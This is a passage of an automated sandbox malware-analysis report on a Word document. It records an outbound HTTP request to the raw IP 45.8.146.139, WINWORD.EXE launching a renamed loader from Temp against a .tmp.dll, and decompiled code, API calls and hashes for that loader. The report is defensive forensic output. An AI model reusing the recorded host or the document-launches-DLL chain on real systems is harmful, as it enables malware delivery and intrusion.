Aug 11, 2022 17:58:07.488120079 CEST	1017	OUT	GET /fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 45.8.146.139 Connection: Keep-Alive
Aug 11, 2022 17:58:07.607016087 CEST	1018	IN	HTTP/1.1 200 OK Date: Thu, 11 Aug 2022 15:58:07 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34 X-Powered-By: PHP/7.2.34 Content-Length: 201 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 72 6d 22 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "rm" was not found on this server.</p></body></html>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXEPID: 5352, Parent PID: 756

General

Target ID:	0
Start time:	17:57:55
Start date:	11/08/2022
Path:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0xa00000
File size:	1937688 bytes
MD5 hash:	0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: r3F3.tmp.exePID: 1992, Parent PID: 5352

General

Target ID:	3
Start time:	17:58:08
Start date:	11/08/2022
Path:	C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe" "C:\Users\user\AppData\Local\Temp\y133.tmp.dll",#1
Imagebase:	0xc0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: __Unknown_Module_Name__

Declaration

Line	Content

Reset < >

Analysis Process: r3F3.tmp.exePID: 1992, Parent PID: 5352COMMON

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23.6%
Total number of Nodes:	733
Total number of Limit Nodes:	7

Executed Functions

Function 000C3F9E Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 193
memorylibrarynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E000C3F9E(intOrPtr _a4, intOrPtr* _a12, intOrPtr _a16) {
				void _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				intOrPtr _t59;
				signed int _t61;
				signed int _t73;
				signed int _t74;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed int _t90;
				void* _t98;
				void* _t101;
				intOrPtr* _t102;
				void* _t106;
				void* _t117;
				void* _t128;
				int _t129;
				intOrPtr _t130;
				void* _t131;
				void* _t132;
				struct HINSTANCE__* _t133;
				signed int _t134;
				void* _t136;

				_t136 = (_t134 & 0xfffffff8) - 0x24;
				_t129 = 0;
				__imp__HeapSetInformation(0, 1, 0, 0, _t128, _t131, _t98);
				_v32 = 1;
				NtSetInformationProcess(0xffffffff, 0x22,  &_v32, 4); // executed
				_t102 = _a12;
				_t117 = _t102 + 2;
				goto L1;
				L4:
				_t101 = LocalAlloc(0x40, _t132 + _t132);
				if(_t101 == 0) {
					L36:
					if( *0xc83c8 == 1) {
						FreeConsole();
					}
					ExitProcess(_t129);
				}
				if(E000C1EA1(_t101, _t132, _a12) >= 0) {
					_t106 = _t101;
					if(E000C564D(_t106,  &_v56,  &_v68,  &_v48,  &_v52) != 0) {
						_t146 = _v56 & 0x00000001;
						if((_v56 & 0x00000001) == 0) {
							__eflags = _v56 & 0x00000002;
							if(__eflags == 0) {
								SetErrorMode(0x8001); // executed
								_v56 = _v56 & 0x00000000;
								_push(_t106);
								_t73 = E000C58CA(_v68,  &_v56); // executed
								_v40 = _t73;
								_t74 = E000C5D14(_t73); // executed
								__eflags = _t74;
								if(__eflags == 0) {
									E000C371B( *0xc83cc, 0x403, _v56, L"requestedRunLevel");
								} else {
									_v48 = _v48 & 0x00000000;
									_v52 = _v52 & 0x00000000;
									_t81 = E000C3C8D(_v56, __eflags, _v36, _v40,  &_v52, _t136 + 0x2c,  &_v48); // executed
									__eflags = _t81;
									if(_t81 != 0) {
										__eflags = _v48;
										if(_v48 != 0) {
											_t81 = _v48;
											_v40 = _v48;
										}
										E000C3D9F(_t81, _v52);
										_t84 = E000C5C0E();
										_t111 = _t129;
										_v56 = _t84;
										_t85 = E000C3F44(_t101, _t129, _v52, __eflags, _v36);
										__eflags = _t85;
										if(_t85 != 0) {
											E000C3EAA( *((intOrPtr*)(_t136 + 0x34)), _v56, _t111, _v40, _a16);
										}
										_t86 = _v56;
										__eflags = _t86;
										if(_t86 != 0) {
											 *0xcb050(_t86);
										}
										FreeLibrary(_v52);
									}
									LocalFree(_v48);
								}
								_t130 =  *((intOrPtr*)(_t136 + 0x2c));
								__eflags = _t130 - 0xffffffff;
								if(_t130 != 0xffffffff) {
									__eflags = _v44;
									if(_v44 != 0) {
										__imp__DeactivateActCtx(0, _v44);
									}
									__imp__ReleaseActCtx(_t130);
								}
							} else {
								_t90 = E000C3F44(_t101, _t129, 0, __eflags, L"localserver");
								__eflags = _t90;
								if(_t90 != 0) {
									E000C35F3(_t90, _v68);
								}
							}
						} else {
							if(E000C3F44(_t101, _t129, 0, _t146, _v68) != 0) {
								E000C3E1D(_v68, _v52);
							}
						}
						if(_t133 != 0) {
							FreeLibrary(_t133);
						}
						_t129 = 0;
					}
				}
				LocalFree(_t101);
				goto L36;
				L1:
				_t59 =  *_t102;
				_t102 = _t102 + 2;
				if(_t59 != 0) {
					goto L1;
				} else {
					 *0xc83cc = _a4;
					 *0xc83c8 = 0;
					_t132 = (_t102 - _t117 >> 1) + 1;
					_t61 = E000C6A0B(_t102 - _t117 >> 1);
					if(_t61 == 0) {
						__imp__AttachConsole(0xffffffff);
						asm("sbb eax, eax");
						 *0xc83c8 =  ~_t61 + 2;
					}
					goto L4;
				}
			}

0x000c3fa6
0x000c3fac
0x000c3fb5
0x000c3fc1
0x000c3fca
0x000c3fd0
0x000c3fd3
0x000c3fd3
0x000c4013
0x000c401f
0x000c4023
0x000c420f
0x000c4216
0x000c4218
0x000c4218
0x000c421f
0x000c421f
0x000c4037
0x000c4041
0x000c4059
0x000c4094
0x000c4099
0x000c40c2
0x000c40c7
0x000c40f2
0x000c40f8
0x000c4101
0x000c4106
0x000c410d
0x000c4111
0x000c4116
0x000c4118
0x000c41d3
0x000c411e
0x000c4126
0x000c412b
0x000c4148
0x000c414d
0x000c414f
0x000c4151
0x000c4156
0x000c4158
0x000c415c
0x000c415c
0x000c4164
0x000c4169
0x000c4176
0x000c4178
0x000c417c
0x000c4181
0x000c4183
0x000c4195
0x000c4195
0x000c419a
0x000c419e
0x000c41a0
0x000c41a3
0x000c41a3
0x000c41ad
0x000c41ad
0x000c41b7
0x000c41b7
0x000c41d8
0x000c41dc
0x000c41df
0x000c41e1
0x000c41e6
0x000c41ee
0x000c41ee
0x000c41f5
0x000c41f5
0x000c40c9
0x000c40d2
0x000c40d7
0x000c40d9
0x000c40e3
0x000c40e3
0x000c40d9
0x000c409b
0x000c40aa
0x000c40b8
0x000c40b8
0x000c40aa
0x000c41fd
0x000c4200
0x000c4200
0x000c4206
0x000c4206
0x000c4059
0x000c4209
0x00000000
0x000c3fd6
0x000c3fd6
0x000c3fd9
0x000c3fdf
0x00000000
0x000c3fe1
0x000c3fe8
0x000c3fed
0x000c3ff3
0x000c3ff6
0x000c3ffd
0x000c4001
0x000c4009
0x000c400e
0x000c400e
0x00000000
0x000c3ffd

APIs

HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 000C3FB5
NtSetInformationProcess.NTDLL(000000FF,00000022,?,00000004), ref: 000C3FCA
AttachConsole.API-MS-WIN-CORE-CONSOLE-L1-2-0(000000FF), ref: 000C4001
LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 000C4019
LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(WLDP.DLL,00000000,00000800,?,?,?), ref: 000C4076
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,WldpIsAllowedEntryPoint), ref: 000C4088
SetErrorMode.KERNELBASE(00008001), ref: 000C40F2
FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 000C41AD
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 000C41B7
DeactivateActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000000,00000000), ref: 000C41EE
ReleaseActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(?), ref: 000C41F5

Part of subcall function 000C35F3: CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002), ref: 000C3604
Part of subcall function 000C35F3: CoInitializeSecurity.API-MS-WIN-CORE-COM-L1-1-0(000C196C,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000000), ref: 000C3620
Part of subcall function 000C35F3: CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000001,00000000,00000000), ref: 000C3638
Part of subcall function 000C35F3: GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 000C364D
Part of subcall function 000C35F3: CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?), ref: 000C368F
Part of subcall function 000C35F3: SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 000C369C
Part of subcall function 000C35F3: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 000C36A3
Part of subcall function 000C35F3: CoWaitForMultipleHandles.API-MS-WIN-CORE-COM-L1-1-0(00000000,00007530,00000001,000C841C,?), ref: 000C36C0
Part of subcall function 000C35F3: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 000C3702
Part of subcall function 000C35F3: CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0 ref: 000C3710

FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 000C4200
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 000C4209
FreeConsole.API-MS-WIN-CORE-CONSOLE-L1-2-0 ref: 000C4218
ExitProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 000C421F

Strings

WldpIsAllowedEntryPoint, xrefs: 000C4082
requestedRunLevel, xrefs: 000C41CA
WLDP.DLL, xrefs: 000C4071
localserver, xrefs: 000C40C9

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: Free$EventLibraryLocal$CloseConsoleCreateHandleInformationInitializeProcess$AddressAllocAttachCurrentDeactivateErrorExitHandlesHeapLoadModeMultipleProcReleaseSecurityThreadUninitializeWait
String ID: WLDP.DLL$WldpIsAllowedEntryPoint$localserver$requestedRunLevel
API String ID: 3307762745-3890604504
Opcode ID: 518c4e4e0fd9a4b8bb9ff4d522b6064b2b3adc6d47bfd8f800b79ad86ac34778
Instruction ID: f310063e025cffc8b2ed1b26f79256d3938ef2e33a146715a2abf4b417555801
Opcode Fuzzy Hash: 518c4e4e0fd9a4b8bb9ff4d522b6064b2b3adc6d47bfd8f800b79ad86ac34778
Instruction Fuzzy Hash: A6613A711083019BE710DF60DC59FAF7BE9BB88714F144A1CF996A61A2CB34DA4ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 000C5D14 Relevance: 10.6, APIs: 7, Instructions: 88
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 34%

			E000C5D14(void* __ecx) {
				signed int _v8;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t18;
				void** _t22;
				char* _t25;
				signed int _t26;
				void* _t28;
				void* _t34;
				signed int _t35;
				signed int _t39;
				signed int _t41;

				_v8 =  *0xc8018 ^ _t39;
				_t18 =  &_v28;
				_t34 = 0;
				_t28 = __ecx;
				_v24 = 0;
				__imp__NtOpenProcessToken(0xffffffff, 8, _t18);
				_t35 = RtlNtStatusToDosError(_t18);
				if(_t35 > 0) {
					_t35 = _t35 & 0x0000ffff | 0x80070000;
					_t41 = _t35;
				}
				if(_t41 >= 0) {
					_t33 =  &_v24;
					_t26 = E000C5C96(_v28,  &_v24); // executed
					_t35 = _t26;
					NtClose(_v28);
					_t34 = _v24;
				}
				_t37 =  !_t35 >> 0x1f;
				if( !_t35 >> 0x1f == 0 || _t34 != 0) {
					L15:
					return E000C6160(_t37, _t28, _v8 ^ _t39, _t33, _t34, _t37);
				} else {
					if(_t28 != 0 && _t28 != 0xffffffff) {
						_t25 =  &_v20;
						__imp__QueryActCtxW(0x80000000, _t28, _t34, 5, _t25, 0xc, _t34);
						if(_t25 != 0) {
							_t34 = _v16;
						}
					}
					_t34 = _t34;
					if(_t34 == 0) {
						_t22 =  &_v24;
						__imp__NtOpenProcessToken(0xffffffff, 0x80, _t22);
						if(_t22 >= 0) {
							_v28 = 1;
							__imp__NtSetInformationToken(_v24, 0x18,  &_v28, 4);
							NtClose(_v24);
						}
					} else {
						if(_t34 != 0) {
							_t37 = 0;
						}
					}
					goto L15;
				}
			}

0x000c5d23
0x000c5d29
0x000c5d2c
0x000c5d33
0x000c5d35
0x000c5d38
0x000c5d45
0x000c5d49
0x000c5d4e
0x000c5d54
0x000c5d54
0x000c5d56
0x000c5d5b
0x000c5d5e
0x000c5d66
0x000c5d68
0x000c5d6e
0x000c5d6e
0x000c5d73
0x000c5d78
0x000c5de8
0x000c5dfa
0x000c5d7e
0x000c5d80
0x000c5d8a
0x000c5d97
0x000c5d9f
0x000c5da1
0x000c5da1
0x000c5d9f
0x000c5da4
0x000c5da7
0x000c5db2
0x000c5dbd
0x000c5dc5
0x000c5dcc
0x000c5dd9
0x000c5de2
0x000c5de2
0x000c5da9
0x000c5dac
0x000c5dae
0x000c5dae
0x000c5dac
0x00000000
0x000c5da7

APIs

NtOpenProcessToken.NTDLL ref: 000C5D38
RtlNtStatusToDosError.NTDLL ref: 000C5D3F
NtClose.NTDLL(00000000), ref: 000C5D68
QueryActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(80000000,00000000,00000000,00000005,?,0000000C,00000000), ref: 000C5D97
NtOpenProcessToken.NTDLL ref: 000C5DBD
NtSetInformationToken.NTDLL ref: 000C5DD9
NtClose.NTDLL(?), ref: 000C5DE2

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: Token$CloseOpenProcess$ErrorInformationQueryStatus
String ID:
API String ID: 3674487995-0
Opcode ID: b32e3d263aa74a7b454a3b986f6b004dc30db5eaf28c22e56cc04603b073f5b2
Instruction ID: 016e2b972d894dcc6204a4134b4890ef3404a695300d3cdee4766495f24d3816
Opcode Fuzzy Hash: b32e3d263aa74a7b454a3b986f6b004dc30db5eaf28c22e56cc04603b073f5b2
Instruction Fuzzy Hash: D8216176A00619ABEB609BA4CD4DFBFBB78EF44722F110218FD15AB1D0D670AD84C690

Uniqueness

Uniqueness Score: -1.00%

Function 000C3A94 Relevance: 7.6, APIs: 5, Instructions: 85
librarywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 000C3AB5
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000008), ref: 000C3AC1
FormatMessageW.KERNELBASE(00001200,00000000,00000000,00000000,?,00000104,00000000,?,00000000,00000008), ref: 000C3B20

Part of subcall function 000C3938: GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 000C3968
Part of subcall function 000C3938: IsWow64Process2.API-MS-WIN-CORE-WOW64-L1-1-1(00000000), ref: 000C396F
Part of subcall function 000C3938: GetSystemDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,000000F6), ref: 000C3998
Part of subcall function 000C3938: PathCchAppend.API-MS-WIN-CORE-PATH-L1-1-0(?,00000105,rundll32.exe), ref: 000C39B3

RtlImageNtHeader.NTDLL(00000000), ref: 000C3B41
SetProcessMitigationPolicy.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-1(00000000,?,00000008,?,00000000,00000008), ref: 000C3B79

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: Process$AppendCurrentDirectoryErrorFormatHeaderImageLastLibraryLoadMessageMitigationPathPolicyProcess2SystemWow64
String ID:
API String ID: 4162338769-0
Opcode ID: 0de8a525dcfdade36678dd53188664a10976ee45a90325469359090fc8f39eb4
Instruction ID: 193a2682814780d59f8b6ac3feeffb7b07f6673b8764563b2f861bf3dc9c88b9
Opcode Fuzzy Hash: 0de8a525dcfdade36678dd53188664a10976ee45a90325469359090fc8f39eb4
Instruction Fuzzy Hash: D32190B0650218AEF7609B258C49FFF76ADEBD4750F1480ADBA09D2191DBB48F448AB1

Uniqueness

Uniqueness Score: -1.00%

Function 000C5C96 Relevance: 4.6, APIs: 3, Instructions: 55
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

			E000C5C96(void* __ecx, signed int* __edx) {
				char _v8;
				char _v12;
				char _v16;
				long _t10;
				signed short _t11;
				signed char _t14;
				signed int* _t19;
				signed short _t26;

				_v8 = 1;
				_t10 =  &_v8;
				_t19 = __edx;
				_t14 = 0;
				 *((intOrPtr*)(__edx)) = 0; // executed
				__imp__NtQueryInformationToken(__ecx, 0x12, _t10, 4,  &_v12); // executed
				if(_t10 >= 0) {
					if(_v8 == 2) {
						L5:
						_t14 = 1;
					} else {
						if(_v8 == 1) {
							_t10 =  &_v16;
							__imp__NtQueryInformationToken(__ecx, 0x14, _t10, 4,  &_v12);
							if(_t10 >= 0 && _v16 != 0) {
								goto L5;
							}
						}
					}
				}
				_t11 = RtlNtStatusToDosError(_t10);
				if(_t11 > 0) {
					_t11 = _t11 & 0x0000ffff | 0x80070000;
					_t26 = _t11;
				}
				if(_t26 >= 0) {
					 *_t19 = _t14 & 0x000000ff;
					return _t11;
				}
				return _t11;
			}

0x000c5ca4
0x000c5cae
0x000c5cb1
0x000c5cb6
0x000c5cbb
0x000c5cbd
0x000c5cc5
0x000c5ccb
0x000c5cef
0x000c5cef
0x000c5ccd
0x000c5cd1
0x000c5cd9
0x000c5ce0
0x000c5ce8
0x00000000
0x00000000
0x000c5ce8
0x000c5cd1
0x000c5ccb
0x000c5cf2
0x000c5cfa
0x000c5cff
0x000c5d04
0x000c5d04
0x000c5d06
0x000c5d0b
0x00000000
0x000c5d0b
0x000c5d13

APIs

NtQueryInformationToken.NTDLL(00000000,00000012,00000001,00000004,?), ref: 000C5CBD
NtQueryInformationToken.NTDLL(00000000,00000014,?,00000004,?), ref: 000C5CE0
RtlNtStatusToDosError.NTDLL ref: 000C5CF2

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: InformationQueryToken$ErrorStatus
String ID:
API String ID: 1049779487-0
Opcode ID: 30c81d32b831d623f4fc3b850caa91150d79803cb96c6525d686b743a6ef86a0
Instruction ID: 89c844ebcfe2b49f06336a27d4eed43cf936f9f62bb2654e8795aafe2244ef57
Opcode Fuzzy Hash: 30c81d32b831d623f4fc3b850caa91150d79803cb96c6525d686b743a6ef86a0
Instruction Fuzzy Hash: C101D275600308BFEB209F91DD89FAEB7FDEB40302F00016EFA41E2140D234AA44D760

Uniqueness

Uniqueness Score: -1.00%

Function 000C3F00 Relevance: 1.5, APIs: 1, Instructions: 28
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E000C3F00() {
				signed int _v8;
				void _v44;
				void* __ebx;
				long _t10;
				long* _t13;
				void* _t16;
				void* _t17;
				void* _t18;
				signed int _t19;

				_v8 =  *0xc8018 ^ _t19;
				_t13 = 0;
				_t10 = NtQuerySystemInformation(0xa4,  &_v44, 0x20, 0); // executed
				if(_t10 >= 0 && (_v44 & 0x00000010) != 0) {
					_t13 = 1;
				}
				return E000C6160(_t13, _t13, _v8 ^ _t19, _t16, _t17, _t18);
			}

0x000c3f0f
0x000c3f13
0x000c3f21
0x000c3f29
0x000c3f31
0x000c3f31
0x000c3f43

APIs

NtQuerySystemInformation.NTDLL ref: 000C3F21

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 80c8c3e62612452cfc6dddd74fa164e868b3f8e5dc101d59ce0f4f0b7a3ae8ff
Instruction ID: a83773466c2de7a6147e6fe7a1d33b1293dc62401e5f83505e36fca944858314
Opcode Fuzzy Hash: 80c8c3e62612452cfc6dddd74fa164e868b3f8e5dc101d59ce0f4f0b7a3ae8ff
Instruction Fuzzy Hash: 4BE02231B0030C6FE310CFA08C89FEEBBB8DB44310F18106EED0197181D9B1AD089364

Uniqueness

Uniqueness Score: -1.00%

Function 000C6580 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E000C6580() {

				SetUnhandledExceptionFilter(E000C6530); // executed
				return 0;
			}

0x000c6585
0x000c658d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006530), ref: 000C6585

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 981454c60049ab8810e5e079e2bfb04d0037e2a0d7b40e141a301c3ba3f25f60
Instruction ID: e2eae72cfbd4bbc90728b54d9f29328df91be6ec7b3581ae59753a9f11fb15a2
Opcode Fuzzy Hash: 981454c60049ab8810e5e079e2bfb04d0037e2a0d7b40e141a301c3ba3f25f60
Instruction Fuzzy Hash: BC9002E0261A004A66101BB07C4DD4A35906B48B62B6104A4A546C8168EA5550445511

Uniqueness

Uniqueness Score: -1.00%

Function 000C58CA Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 262
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathIsRelativeW.API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-1(?,00000000,00000000,00000000), ref: 000C58EB
RtlSetSearchPathMode.NTDLL ref: 000C58FA
SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,00000104,?,?), ref: 000C5916
GetFileAttributesW.KERNELBASE(?,?,?), ref: 000C599C
CreateActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000020,?,?), ref: 000C59AE
CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 000C59F4
CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 000C5A15
CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 000C5A32
GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?), ref: 000C5A60
CreateActCtxWWorker.KERNEL32(?,?,?), ref: 000C5A7D
ActivateActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(?,00000000,?,?), ref: 000C5A8E
memset.MSVCRT ref: 000C5B47
CompareStringW.API-MS-WIN-CORE-STRING-L1-1-0(0000007F,00000001,?,000000FF,IME,000000FF), ref: 000C5B77

Strings

N, xrefs: 000C5AD9
IME, xrefs: 000C5B65
.manifest, xrefs: 000C5985
|, xrefs: 000C5A0A
, xrefs: 000C595A
, xrefs: 000C5A73

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: Create$Worker$Path$Search$ActivateAttributesCompareFileHandleModeModuleRelativeStringmemset
String ID: $ $.manifest$IME$N$|
API String ID: 2530136470-3161873098
Opcode ID: dbed91705660f8a90f6c3b6aa034b203fa0b1a1c7bf8cf75128ae31844d41188
Instruction ID: f7f5c33457a73e9cd1d5cb3105b1b721a980c32b9bef1a61164947c8f0f02d48
Opcode Fuzzy Hash: dbed91705660f8a90f6c3b6aa034b203fa0b1a1c7bf8cf75128ae31844d41188
Instruction Fuzzy Hash: 5391D275500619AFEB209B24DC8DFDE7BB8EB45321F104299F929E21D0DB78AD848F61

Uniqueness

Uniqueness Score: -1.00%

Function 000C3938 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 107
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

